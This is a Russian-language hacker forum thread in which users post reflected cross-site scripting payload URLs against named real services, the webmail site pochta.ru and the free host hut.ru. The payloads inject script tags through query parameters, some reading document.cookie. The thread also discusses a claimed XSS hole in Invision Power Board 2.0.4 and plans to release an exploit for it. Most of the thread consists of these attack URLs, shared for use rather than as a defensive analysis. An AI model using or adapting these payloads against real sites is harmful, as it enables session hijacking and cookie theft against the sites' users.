1) Нашел на почта.ру вот http://www.pochta.ru/info.php?lng=&mid="><script>alert('XSS by m0nzt3r');</script>
если ее ктото находил уже то извиняюсь...
2) и еше один на hut.ru (это бесплатный хостинг)
http://register.hut.ru/cgi-bin/sp.cgi?fqdn="<script>alert('XSS by m0nzt3r');</script>
=))
недаром говорят что все бесплатное бывает дыряво..

я на Ipb 2.0.4 нашел Xss пока сейчас пишу сплоит на него !
Думаю наднях будет релиз и видео

Во! молодец значит 2.0.4 тож дырявая..на чем пишешь сплойт и как далеко можно использовать эту багу?

на Xss сплоит????
Странно а сплоит для чего не понял?
Или он будет админа заманивать? =)

Morph (http://forum.antichat.ru/member.php?u=1825), под сплойтом в данном случае имеется ввиду полноценный скрипт.

PinkPanther ага ты прав. Думаю на днях опубликую багу =)

А терь понял ступил малась =))
ИМХО.Но все же не сплоит тогда код уж.

Вообщето, и в 1.* и в 2.* изначально есть XSS. Вложеные теги.
http://antichat.ru/txt/IPB/index3.php

эээ Клез а я обрадовался ))))))) это когда в админке добавяешь форумы то в комментах к ним теги не фильтрируются =))) так как комменты можно писать из админки то следовательно для проведения хсс надо быть админом )) а если ты админ то нафиг тебе хСС?))))))))))) у меня прошло на 2.0.3 нуленой версии у Клеза на 2.0.4 наверно есть во всех версиях ))

http://www5.pochta.ru/list.php?id=N120a73d59d3c156887ed01b5f9215aa&mbfs=%3Cscript%3Ealert%28document.cookie%29%3C%2Fs cript%3E&bt_create=%CE%EA

http://www3.pochta.ru/list.php?lng=en&id=N71e37161bc49873482fcf68b3e497f5&aid=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E&rid=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www10.pochta.ru/mailbox.php?lng=%22%3Cscript%3Ealert(document.cook ie)%3C/script%3E&id=Nd558588a9be04bfdf2a54ea6ea0ce32

http://www10.pochta.ru/mailbox.php?id=Nd558588a9be04bfdf2a54ea6ea0ce32&chset=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www10.pochta.ru/info.php?sid=&lng=&mid=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www10.pochta.ru/regform.php?sid=3beff5fe76e261870e27716b82a73162&lng=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E&rnd=%3Cscript%3Ealert(document.cookie)%3C/script%3E

а ты не подумал что мы не сможем это просмотреть=))))сессиЯ)

Там пофигу пройдет так что никаких сессий =)
Так что все путем =)
Все нормально смотриться!

Там пофигу пройдет так что никаких сессий =)
Так что все путем =)
Все нормально смотриться!
Нифига, скрипт выполнится только если значение id
верное. А его уже не перехватишь...
Так что дырка абсолютно бесполезная.

хехе
Ну я же не говорил что ими мона что то угнать тема была XSS pochta.ru
Вот я и выложил а пасивыне или активные никто не спрашивал.

http://www10.pochta.ru/mailbox.php?lng=%22%3Cscript%3Ealert(document.cook ie)%3C/script%3E&id=Nd558588a9be04bfdf2a54ea6ea0ce32

А почему здесь:
(document.cook ie)
В середине слова cookie стоит пробел?
А в других ссылках на XSS ОТ Морфа пробел не ставится?
Что-то с форумом?

Нет это случайно вышло в блокноте валялось вот и развалилось а так без пробела должено быть =)

Знаю, что без пробела Вот я написал без пробела, а получилось с пробелом !!!! Сам смотри ))) Чё за нах...???)))

http://www10.pochta.ru/mailbox.php?lng=%22%3Cscript%3Ealert(document.cook ie)%3C/script%3E&id=Nd558588a9be04bfdf2a54ea6ea0ce32

Так задуманно =)